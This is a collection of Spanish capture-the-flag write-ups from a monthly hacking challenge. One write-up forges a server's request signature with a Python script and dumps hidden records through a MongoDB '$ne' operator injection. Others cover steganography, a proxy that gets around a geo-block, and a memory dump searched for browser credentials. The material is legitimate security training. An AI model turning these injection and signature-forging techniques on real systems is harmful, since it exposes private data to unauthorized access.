--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio2/darkeagle/darkeagle-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio2/julianjm/julianjm-episodio2.md:
--------------------------------------------------------------------------------
1 | # UAM - Matrix - Episode 2
2 |
3 | 15/04/2019
4 |
5 | julianjm - [blog](https://julianjm.github.io) - [telegram](https://t.me/julianjm)
6 |
7 | ## El reto
8 |
9 | > (Resumen) Hay que destripar la siguiente web: `http://34.247.69.86/matrix/episodio2/index.php`
10 |
11 |
12 |
13 | ## Primeros pasos
14 |
15 | Al entrar, vemos información del primer registro (id: 1). Nuestra primera idea es intentar obtener los siguientes registros.
16 |
17 | ```bash
18 | curl "http://34.247.69.86/matrix/episodio2/index.php?id=2"
19 | [...]
20 | Undefined hash
21 | ```
22 |
23 | Nos dice que hash no está definido:
24 |
25 | ```bash
26 | curl "http://34.247.69.86/matrix/episodio2/index.php?id=2&hash=prueba"
27 | [...]
28 | Hash error
29 | ```
30 |
31 | Entendemos que el servidor espera algún tipo de firma... Probamos a pasar como hash el md5, sha1, sha256, del valor en id, pero siempre vemos el mismo error.
32 |
33 | ## Javascript + Web Assembly
34 |
35 | Investigamos un poco la web, y vemos que hace referencia a un par de ficheros javascript. Empezamos por index.min.js. Lo formateamos con Chrome (pinchando en {}) y obtenemos código parcialmente ofuscado. Buscando en Google algunas constantes que aparecen, como 0x28955b88, vemos que pertenece a una función que realiza el MD5. Vamos bien.
36 |
37 | Al final del fichero vemos dos funciones. nono() nos trollea cada vez que hacemos un resize de la página. doIt() es extraña, porque nadie la llama:
38 |
39 | ```javascript
// Raw form as found in index.min.js: identifiers are mangled and string
// constants appear to be fetched through the _0x3358() lookup table
// ('0x13' -> "substr", '0x14' -> "_calc", judging by the deobfuscated version).
function doIt(_0x3a59ab) {
var _0x5482b3 = OMG(_0x3a59ab);
var _0x32ea98 = '0x' + _0x5482b3[_0x3358('0x13')](0x0, 0x8);
var _0x38175b = '0x' + _0x5482b3[_0x3358('0x13')](0x8, 0x8);
var _0x49b2a5 = '0x' + _0x5482b3[_0x3358('0x13')](0x10, 0x8);
var _0x340f9f = '0x' + _0x5482b3[_0x3358('0x13')](0x18, 0x8);
return Module[_0x3358('0x14')](_0x32ea98, _0x38175b, _0x49b2a5, _0x340f9f);
}
48 | ```
49 |
50 | Después de desofuscarla nos queda esto:
51 | ```javascript
// Client-side "signature": MD5 of val, split into four 8-hex-digit (32-bit)
// words that are handed to the wasm export _calc.
// Nothing secret enters this computation, so anyone with the page source can
// reproduce it: it is a checksum, not a MAC.
// The wasm function returns a signed 32-bit int; `>>> 0` yields the unsigned
// form the server actually accepts.
function doIt(val) {
var md5 = OMG(val);                      // OMG() produces the MD5 hex digest
var p1 = '0x' + md5.substr(0, 8);        // digest bytes 0-3
var p2 = '0x' + md5.substr(8, 8);        // digest bytes 4-7
var p3 = '0x' + md5.substr(16, 8);       // digest bytes 8-11
var p4 = '0x' + md5.substr(24, 8);       // digest bytes 12-15
return Module['_calc'](p1, p2, p3, p4);  // _calc is exported from main.wasm via the main.js glue
}
60 | ```
61 |
62 | Poniendo unos *console.log()* vemos que OMG está haciendo el MD5. Posteriormente divide ese hash en 4 partes de 8 `nibbles`, y se los pasa a la función *_calc*...
63 |
64 | Probamos a llamarla desde la consola del navegador:
65 |
66 | ```javascript
67 | doIt(1)
68 | 113948091
69 | doIt(2)
70 | -163535797
71 | ```
72 |
73 | La función *_calc* está definida en main.js. Este fichero parece autogenerado. Es una especie de interfaz entre el navegador y el fichero main.wasm, Web Assembly.
74 |
75 | Usaremos wasmdec, que intenta decompilar los webassembly a C. El fichero que genera es bastante grande, pero buscando por *_calc*, vemos estas líneas:
76 |
77 | ```c
78 | /*
79 | Function 'fn_4':
80 | WASM name: '4'
81 | Export name: '_calc'
82 | */
83 |
int fn_4(int local_0, int local_1, int local_2, int local_3) {
// Lots of filler trimmed from the decompiler output; the local_N temporaries
// are used without declarations here, so this excerpt is not compilable as-is.
// Only the four arguments feed the result -- no key or secret is involved.

local_11 = local_0;
local_12 = local_1;
local_13 = local_2;
local_14 = local_3;
local_16 = local_11;
local_4 = local_12;
local_5 = local_16 ^ local_4;   // local_0 ^ local_1
local_6 = local_13;
local_7 = local_5 ^ local_6;    // ... ^ local_2
local_8 = local_14;
local_9 = local_7 ^ local_8;    // ... ^ local_3
local_15 = local_9;
local_10 = local_15;

return local_10; // Boiling that mess down: it returns the XOR of the 4 parameters.
}
103 | ```
104 |
105 | ## Generando hashes
106 |
107 | Suponemos que el método de hashing utilizado es el de la función *_calc* que acabamos de ver, es decir, MD5 y XOR de sus 4 bloques de 4 bytes. Volvemos a la carga:
108 |
109 | ```bash
110 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=113948091"
111 | [...]
112 | Hash error
113 | ```
114 |
115 | Nos damos cabezazos contra el teclado mientras esperamos que liberen una pista:
116 | > El hash requerido utiliza la string "34.247.69.86/matrix/episodio2/index.php?id=(?)"
117 |
118 | Aaaaamigo. Ya sabemos cómo firmar nuestras peticiones. Probamos con el id=1:
119 |
120 | ```javascript
121 | doIt("34.247.69.86/matrix/episodio2/index.php?id=1")
122 | -1758453311
123 | ```
124 |
125 | ```bash
126 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=-1758453311"
127 | [...]
128 | Hash error
129 | ```
130 |
131 | Sigue fallando. En este punto ya tenía una función que calculaba los hashes en python, y resulta que los calcula como un entero sin signo. El mismo hash quedaría como 2536513985:
132 |
133 | ```bash
134 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=2536513985"
135 | [...]
136 | Id: 1 Nombre: Morfeo Sexo: Varon
137 | ```
138 |
139 | Vamos bien. Como nota curiosa, la forma de convertir de entero con signo a sin signo en JavaScript es hacer uso del operador `>>>` (desplazamiento a la derecha sin signo), que convierte a unsigned. Si le pedimos que desplace 0 bits, nos deja el mismo valor, pero sin signo:
140 |
141 | ```javascript
142 | doIt("34.247.69.86/matrix/episodio2/index.php?id=1") >>> 0
143 | 2536513985
144 | ```
145 |
146 | ## Automatizando con Python
147 |
148 | Ahora que sabemos cómo interactuar con la página, vamos a automatizarlo.
149 |
150 | ```python
import hashlib
import sys

import requests
153 |
def calc_hash(val):
    """Reproduce the browser's doIt(): MD5 the value, then XOR its four 32-bit words.

    ``val`` is stringified before hashing, so ``calc_hash(1)`` equals
    ``calc_hash("1")``.  The result is the unsigned 32-bit value the
    server accepts (the wasm ``_calc`` returns the same bits as a signed int).
    """
    digest = hashlib.md5(str(val).encode()).hexdigest()
    folded = 0
    # Walk the 32 hex digits in four 8-digit (32-bit) words and fold them with XOR.
    for offset in range(0, 32, 8):
        folded ^= int(digest[offset:offset + 8], 16)
    return folded
163 |
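if len(sys.argv) > 1:
    record_id = sys.argv[1]  # named record_id so the builtin id() is not shadowed
    # The server signs the URL string, not the bare id value.
    datos_a_firmar = "34.247.69.86/matrix/episodio2/index.php?id=" + record_id
    h = calc_hash(datos_a_firmar)

    # A timeout keeps a stalled server from hanging the script indefinitely.
    r = requests.get(
        "http://34.247.69.86/matrix/episodio2/index.php",
        {"id": record_id, "hash": h},
        timeout=10,
    )
    print(r.text)
else:
    # Usage message (the literal must be terminated or the script does not parse).
    print("python3 makerequest.py <id>")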
173 |
174 | ```
175 |
176 | Con este script podemos generar peticiones para parámetros id arbitrarios. Vemos que hay registros hasta el 7, pero el 8 devuelve vacío.
177 | Intentamos (con cuidado) probar hasta el 100, pero no encontramos nada.
178 | Intentamos también realizar inyecciones SQL del tipo `id="0' or '1'='1"`. Puede que esté más filtrado de la cuenta, o que directamente no sea SQL.
179 |
180 | Probamos inyección para Mongodb. Se basa en hacer llegar un array (en lugar de un string) a la función que hace la consulta. La consulta `['id'=>$_GET['id']]`, que en condiciones normales compara *id* con un string, si conseguimos pasarle un array, podemos añadir modificadores.
181 |
182 | Por ejemplo, `['id' => ['$ne' => '1']]` buscaría todos los registros cuyo *id* sea distinto de 1.
183 |
184 | Gracias a PHP, crear arrays es de lo más sencillo. Pasando ?id[hola]=mundo a la petición web, obtenemos en la parte php la siguiente variable $_GET['id'], que contiene el array [ "hola" => "mundo" ].
185 |
186 | Modificamos la petición de la función anterior:
187 |
188 | ```python
189 | r = requests.get("http://34.247.69.86/matrix/episodio2/index.php", {"id[$ne]":id, "hash":h})
190 | ```
191 |
192 | Nota: Nos damos cuenta de que, aunque pasemos un array, el servidor sigue calculando el hash con el valor final de *id*, en lugar de con el array en sí, lo cual agradecemos, ya que complicaría la inyección enormemente... (o no, nunca lo sabremos: md5(array()) devuelve NULL :))
193 |
194 | ```html
195 | $ python3 makerequest.py 0
196 | [...]
197 | Id: 1 Nombre: Morfeo Sexo: Varon
198 |
Id: 2 Nombre: Trinity Sexo: Mujer
199 |
Id: 3 Nombre: Oraculo Sexo: Mujer
200 |
Id: 4 Nombre: Cypher Sexo: Varon
201 |
Id: 5 Nombre: Dozer Sexo: Varon
202 |
Id: 6 Nombre: Neo Sexo: Varon
203 |
Id: 7 Nombre: Mujer de rojo Sexo: Mujer
204 |
Id: 57069 Nombre: 125:101:115:173:61:60:66:67:62:64:60:71:60:145:64:142:62:70:146:64:62:145:67:63:70:66:62:60:141:64:60:67:65:67:146:62:175 Sexo: XXX
205 | ```
206 |
207 | Bingo!
208 |
209 | ## Última parte
210 |
211 | Por fin vemos datos del último registro. Por fuerza bruta, con ese Id, habríamos tardado un buen rato.
212 |
213 | Solo nos falta decodificarlos. Una simple conversión a ASCII no funciona. Nos damos cuenta (después de un rato) de que no hay ningún número 8 ni 9. Podría ser octal.
214 |
215 | ```bash
216 | $ NUMEROS=`echo 125:101:115:173:61:60:66:67:62:64:60:71:60:145:64:142:62:70:146:64:62:145:67:63:70:66:62:60:141:64:60:67:65:67:146:62:175 | tr ':' ' '`
217 | $ for n in $NUMEROS ; do rax2 ${n}o ; done | rax2 -s
218 |
219 | UAM{106724090e4b28f42e738620a40757f2}
220 | ```
221 |
222 | Ahí, abusando de radare :)
223 |
224 | En fin, un buen reto, con muchos temas de los que aprender. Esperando al reto del próximo mes!
225 |
226 |
--------------------------------------------------------------------------------
/writeups/matrix/episodio2/nachinho3/nachinho3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio2/nachinho3/nachinho3-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio3/arsenics/arsenics-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/arsenics/arsenics-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/darkeagle/darkeagle-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/j0n3/j0n3-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission02/1v4n/1v4n-mission02.txt:
--------------------------------------------------------------------------------
1 | Buenas noches y felices fiestas, mi nick será "1v4n" estoy empezando y espero me perdonéis las incorrecciones.
2 |
3 | URL publicación de la mision #002 : http://unaaldia.hispasec.com/2017/12/segunda-entrega-una-al-mes-mision-002.html
4 |
5 | Texto:
6 | "En esta misión Rick debe encontrar los datos ocultos en una imagen, pero tiene un problema, parece que no puede acceder a ella. Necesita tu ayuda..."
7 |
8 | URL datos mision #002 : http://34.253.233.243/mission2.php
9 |
10 | Texto: "(ES)
11 | Hemos encontrado un servidor vulnerable de la empresa 'Santa Claus Inc' el cuál solo es accesible desde el país donde se encuentra la fábrica. Debemos de encontrar la manera de entrar y sacar la información oculta de la imagen que nos aparece.
12 |
13 | Mucha suerte."
14 |
15 | Nivel: Fácil (según el organizador)
16 |
17 | Categoría: Esteganografía // Criptografía //...
18 |
19 | URL del servidor: http://34.253.233.243/navidad/index.php
20 |
21 | Pasos a la solución:
22 |
23 | 1. La URL de la misión al visitarla nos da el siguiente análisis de codigo:
24 |
25 |
26 |
27 | Postal
28 |
29 |
30 |
31 | Seguimos el link de Postal que nos presenta la index.php y, como nos informa el texto de la misión, es inaccesible si no es desde el país de "Santa Claus Inc", que según el análisis del anterior punto es Canadá. El análisis de la URL visitada http://34.253.233.243/navidad/img/renitos.jpg es el siguiente, de donde obtenemos un error 403:
32 |
33 |
34 |
35 |
36 |
37 | Forbidden
38 |
39 | You don't have permission to access /navidad/img/renitos.jpg
40 | on this server.
41 |
42 |
43 |
44 |
45 | Apache/2.4.25 (Debian) Server at 34.253.233.243 Port 80
46 |
47 |
48 |
49 | Con lo cual tomamos la decisión de utilizar un WebProxy que salga a Internet en Canadá, que en este caso será https://www.vpnbook.com/webproxy, y sin más introducimos la URL http://34.253.233.243/navidad/img/renitos.jpg . Conseguimos el objetivo de visualizar renitos.jpg y lo descargamos a nuestro escritorio.
50 |
51 | 4. Pero sospechábamos que no era tan sencillo y que renitos.jpg podría esconder un mensaje o un archivo como nos avisan en la misión. Pasamos a utilizar la herramienta de Steghide de Kali. Obteniendo el siguiente análisis:
52 |
53 | 1v4n@kali:~/Escritorio$ steghide info renitos.jpg
54 | "renitos.jpg":
55 | formato: jpeg
56 | capacidad: 68,0 KB
57 | Intenta informarse sobre los datos adjuntos? (s/n) s
58 | Anotar salvoconducto:
59 | archivo adjunto "renitos.txt":
60 | tamaño: 88,0 Byte
61 | encriptado: rijndael-128, cbc
62 | compactado: si
63 |
64 | 5. Nos desvela que el archivo renitos.jpg esconde un archivo de texto en formato .txt y que vamos a extraer mediante:
65 |
66 | 1v4n@kali:~/Escritorio$ steghide extract -sf renitos.jpg
67 | Anotar salvoconducto:
68 | anota los datos extraidos en"renitos.txt".
69 |
70 | El archivo renitos.txt esconde un texto codificado KVAU262NMVZHE6K7INUHE2LTORWWC427MFXGIX2IMFYHA6K7JZSXOX2ZMVQXEX3GOJXW2X2INFZXAYLTMVRX2=== que está en base32. En este caso vamos a utilizar la herramienta online gratuita https://emn178.github.io/online-tools/ y por fin conseguimos la FLAG de este reto.
71 |
72 | FLAG
73 |
74 | UAM{Merry_Christmas_and_Happy_New_Year_from_Hispasec}
75 |
--------------------------------------------------------------------------------
/writeups/missions/mission02/nachinho3/nachinho3-mission02.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission02/nachinho3/nachinho3-mission02.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission03/nachinho3/nachinho3-mission03.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission03/nachinho3/nachinho3-mission03.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission04/j0n3/j0n3-mission04.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission04/j0n3/j0n3-mission04.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission05/j0n3/j0n3-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/j0n3/j0n3-mission05.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission05/nachinho3/nachinho3-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/nachinho3/nachinho3-mission05.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission05/percu/percu-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/percu/percu-mission05.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission05/rafamartos/rafamartos-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/rafamartos/rafamartos-mission05.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission06/1v4n/1v4n-mission06.txt:
--------------------------------------------------------------------------------
1 | Descripción
2 |
3 | Nombre: Misión#006
4 |
5 | Fecha de liberación: 15 de Abril del 2018
6 |
7 | Dificultad: Fácil (según los retadores)
8 |
9 | Información personal:
10 |
11 | Nombre: Beatrix Michelle Kiddo
12 | Año de nacimiento: 1976
13 | Trabajo: Ex Asesina
14 | Afiliación: Antiguamente en 'Deadly Viper Assasination Squad'
15 |
16 | Misión:
17 |
18 | Introducción:
19 |
20 | La flag escondida en esta prueba te va a dar a escoger entre dos opciones. Esperemos que escojas bien, sino vas a recibir las consecuencias…
21 |
22 | Información adicional:
23 |
24 | URL conseguida: goo.gl/YUNxSu
25 |
26 | Esta vez seremos "La Mamba Negra" una ex-asesina, después de su incidente en la capilla juró vengarse y nosotros deberemos ayudarle en su misión.
27 |
28 | Objetivo
29 |
30 | Formato de flag: UAM{flag}
31 |
32 | Herramientas utilizadas
33 |
34 | Chrome (66.0.3359.106) https://www.google.com/chrome/
35 | file (5.33) https://github.com/file/file // http://freshmeat.sourceforge.net/projects/file/
36 | strings (2.30)
37 | curl (7.59) https://github.com/curl/curl // https://curl.haxx.se/
38 | hashID | hash-identifier (3.1.4) https://github.com/psypanda/hashID
39 | https://md5online.org
40 | https://29a.ch/photo-forensics/#forensic-magnifier
41 | https://gchq.github.io/CyberChef/
42 |
43 | Resumen:
44 |
45 | Comenzamos por visitar la página de la misión donde se nos entrega la url como única pista.
46 |
47 | Visitamos la url acortada de google ( https://goo.gl/YUNxSu ) con el navegador la cual hace una redirección al Drive de Google en:
48 | https://drive.google.com/file/d/1J2mMiIwqZ_pgRBEUEccyepJrBPH3c_FA/view
49 |
50 | Descargamos en la parte superior derecha de la pantalla o utilizamos con curl la descarga del archivo llamado bill2.jpg que nos arroja un fotograma de la película donde se muestra a la actriz Uma Thurman como el personaje de Beatrix:
51 |
52 |
53 | $ curl -L -o bill2.jpg 'https://drive.google.com/uc?export=download&id=1J2mMiIwqZ_pgRBEUEccyepJrBPH3c_FA'
54 |
55 | Al descargar el archivo bill2.jpg su análisis inicial nos arroja:
56 |
57 | $ file bill2.jpg
58 | bill2.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x630, frames 3
59 |
60 | $ strings bill2.jpg
61 | JFIF
62 | …
63 | aa81a304ea2a25ad2947a03062c05fdf
64 |
65 | Podemos observar que nos arroja un hash (una cadena de 32 caracteres hexadecimales, es decir, 128 bits). Para poder identificarlo lanzamos la tool hash-identifier:
66 |
67 | $ hashid aa81a304ea2a25ad2947a03062c05fdf
68 | Analyzing 'aa81a304ea2a25ad2947a03062c05fdf'
69 | [+] MD2
70 | [+] MD5
71 | [+] MD4
72 | [+] Double MD5
73 | [+] LM
74 | [+] RIPEMD-128
75 | [+] Haval-128
76 | [+] Tiger-128
77 | [+] Skein-256(128)
78 | [+] Skein-512(128)
79 | [+] Lotus Notes/Domino 5
80 | [+] Skype
81 | [+] Snefru-128
82 | [+] NTLM
83 | [+] Domain Cached Credentials
84 | [+] Domain Cached Credentials 2
85 | [+] DNSSEC(NSEC3)
86 | [+] RAdmin v2.x
87 |
88 | Optamos por el hash más común MD5 y nos ayudamos de la herramienta online https://md5online.org/md5-decrypt.html y obtenemos:
89 |
90 | Found : goo.gl/4kxSs7
91 | (hash = aa81a304ea2a25ad2947a03062c05fdf)
92 |
93 | Hemos obtenido una url acortada de Google ( https://goo.gl/4kxSs7 ) redireccionándonos a https://drive.google.com/file/d/18nlxec8n1ziQJmSXOMfa1e4IoG1FsPRA/view a un archivo llamado kill-bill-movie.png imagen de nuevo de nuestra protagonista Beatrix:
94 |
95 | $ curl -L -o kill-bill-movie.png 'https://drive.google.com/uc?export=download&id=18nlxec8n1ziQJmSXOMfa1e4IoG1FsPRA'
96 |
97 | Al descargar el archivo kill-bill-movie.png su análisis inicial nos arroja:
98 |
99 | $ file kill-bill-movie.png
100 | kill-bill-movie.png: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
101 |
102 | Comprobamos strings y binwalk sin arrojarnos nada significativo ni que oculte ningún otro archivo diferente a la imagen :
103 |
104 | $ binwalk kill-bill-movie.png
105 |
106 | DECIMAL HEXADECIMAL DESCRIPTION
107 | --------------------------------------------------------------------------------
108 | 0 0x0 PNG image, 1920 x 1080, 8-bit/color RGBA, non-interlaced
109 | 180 0xB4 Zlib compressed data, best compression
110 |
111 | Documentándose en Google y observando que no esconde ningún archivo, nos enfrentamos a un reto de esteganografía.
112 |
113 | Lanzamos varias tools bastante utilizadas en esteganografía como steghide, stegosuite y openstego sin obtener ningún resultado.
114 |
115 | Tomando la orientación que la esteganografía podría ser más visual utilizamos la herramienta online https://29a.ch/photo-forensics/#forensic-magnifier
116 |
117 |
118 | Jugando con el cursor por encima de la imagen de Beatrix detectamos un código Morse a los pies de la protagonista, obteniendo la siguiente cadena.
119 |
120 | ...- ..- ..-. -. . ----- ... -..- - --. -..- ..-. --.- .--- ..-. -- -... ..-. ----. ...- -..- .---- .--- .-.. - - -... ----.
121 |
122 | Añadir que con la tool en Java de StegSolve 1.3 by Caesum también pudimos ver la misma cadena.
123 |
124 | Decodificando nos da el siguiente string:
125 |
126 | VUFNE0SXTGXFQJFMBF9VX1JLTTB9
127 |
128 | Analizamos el siguiente string en https://md5hashing.net/hash_type_checker, arrojándonos que lo identifica como base64
129 |
130 | $ echo -n VUFNE0SXTGXFQJFMBF9VX1JLTTB9 | base64 -d
131 | UAMD�Le�@�L_U_RKM0}
132 |
133 | La decodificación nos da un resultado muy cercano al formato de la flag que es UAM{flag} .
134 |
135 | A partir de aquí viene un punto de inflexión y de comprobar que el resultado de decodificar un MORSE siempre será un resultado en MAYÚSCULAS pero una cadena de base64 varía dependiendo de las mayúsculas y las minúsculas (Case Sensitive).
136 |
137 | Nos ayudamos de una navaja suiza online CyberChef:
138 |
139 | https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&input=VlVGTkUwU1hUR1hGUUpGTUJGOVZYMUpMVFRCOQ
140 |
141 | Que nos permite jugar con el string de base64 hasta conseguir una flag dentro de formato y con sentido quedando el base64 de esta forma:
142 |
143 | VUFNe0sxTGxfQjFMbF9vX1JlTTB9
144 |
145 | Y la solución
146 |
147 | La flag es: UAM{K1Ll_B1Ll_o_ReM0}
148 |
--------------------------------------------------------------------------------
/writeups/missions/mission06/nachinho3/nachinho3-mission06.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission06/nachinho3/nachinho3-mission06.pdf
--------------------------------------------------------------------------------
/writeups/missions/mission06/rafamartos/rafamartos-mission06.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission06/rafamartos/rafamartos-mission06.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/1v4n/1v4n-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/1v4n/1v4n-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/arsenics/arsenics-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/arsenics/arsenics-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/bicacaro/bicacaro-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/darkeagle/darkeagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/darkeagle/darkeagle-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/j0n3/j0n3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/nachinho3/nachinho3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/percu/percu-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/percu/percu-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/rafamartos/rafamartos-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/rafamartos/rafamartos-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/ramonsola/ramonsola-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/ramonsola/ramonsola-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/rubenansotegui/rubenansotegui-episodio1.txt:
--------------------------------------------------------------------------------
1 | WriteUp: SILICON VALLEY - EPISODIO 1
2 |
3 | Se descarga el fichero del enlace: http://www.mediafire.com/file/31pj2a5umpfm345/GILFOYLE-HELLDD.zip y se descomprime.
4 |
5 | Se identifica la imagen con la herramienta volatility (ya por el tamaño, 2G, apunta a un volcado de memoria):
6 | vol.py imageinfo -f GILFOYLE-HELLDD.raw
7 |
8 | INFO : volatility.debug : Determining profile based on KDBG search...
9 | WARNING : volatility.debug : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
10 | WARNING : volatility.debug : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
11 | WARNING : volatility.debug : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
12 | Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
13 | AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
14 | AS Layer2 : FileAddressSpace (GILFOYLE-HELLDD.raw)
15 | PAE type : No PAE
16 | DTB : 0x187000L
17 | KDBG : 0xf800029f00a0L
18 | Number of Processors : 1
19 | Image Type (Service Pack) : 1
20 | KPCR for CPU 0 : 0xfffff800029f1d00L
21 | KUSER_SHARED_DATA : 0xfffff78000000000L
22 | Image date and time : 2018-09-15 09:56:27 UTC+0000
23 | Image local date and time : 2018-09-15 11:56:27 +0200
24 |
25 | Realizamos un escaneo de todos los ficheros presentes en el volcado de memoria.
26 | vol.py -f GILFOYLE-HELLDD.raw --profile=Win7SP1x64 filescan > filelist.txt
27 |
28 | En este momento, se dan varias vueltas revisando todos los ficheros interesantes. Para ello abrimos el fichero resultante con Notepad++ y, quedándonos sólo con la ruta, lo ordenamos alfabéticamente y prestamos atención a las carpetas más características, entre ellas \Device\HarddiskVolume2\Users\unaalmes\.
29 | Como buscamos unas credenciales de una página web probamos sin éxito en las contraseñas guardadas de los navegadores.
30 | - Firefox: aunque se encuentra el fichero key4.db (que contiene la clave maestra de cifrado) en la ruta \Device\HarddiskVolume2\Users\unaalmes\AppData\Roaming\Mozilla\Firefox\Profiles\diwevb8u.default-1517848615580, no se encuentra el fichero con los logins cifrados logins.json.
31 | - Internet Explorer: tras varias vueltas a claves del registro mediante las funciones hivelist, hivedump y printkey de volatility sin éxito, se acaba descartando esta vía.
32 |
33 | Finalmente se repasan los ficheros otra vez y se encuentra el fichero info.odt en el escritorio (Desktop) del usuario:
34 | 0x000000007fcabd50 1 1 RW-r-- \Device\HarddiskVolume2\Users\unaalmes\Desktop\info.odt
35 |
36 | Se obtiene mediante volatility:
37 | vol.py -f GILFOYLE-HELLDD.raw --profile=Win7SP1x64 dumpfiles -n -S summary.txt -D .\imagefiles\ -Q 0x000000007fcabd50
38 | Volatility Foundation Volatility Framework 2.6
39 | DataSectionObject 0x7fcabd50 None \Device\HarddiskVolume2\Users\unaalmes\Desktop\info.odt
40 |
41 | Se abre el fichero y su contenido se copia a Notepad++ para facilitar su manipulación.
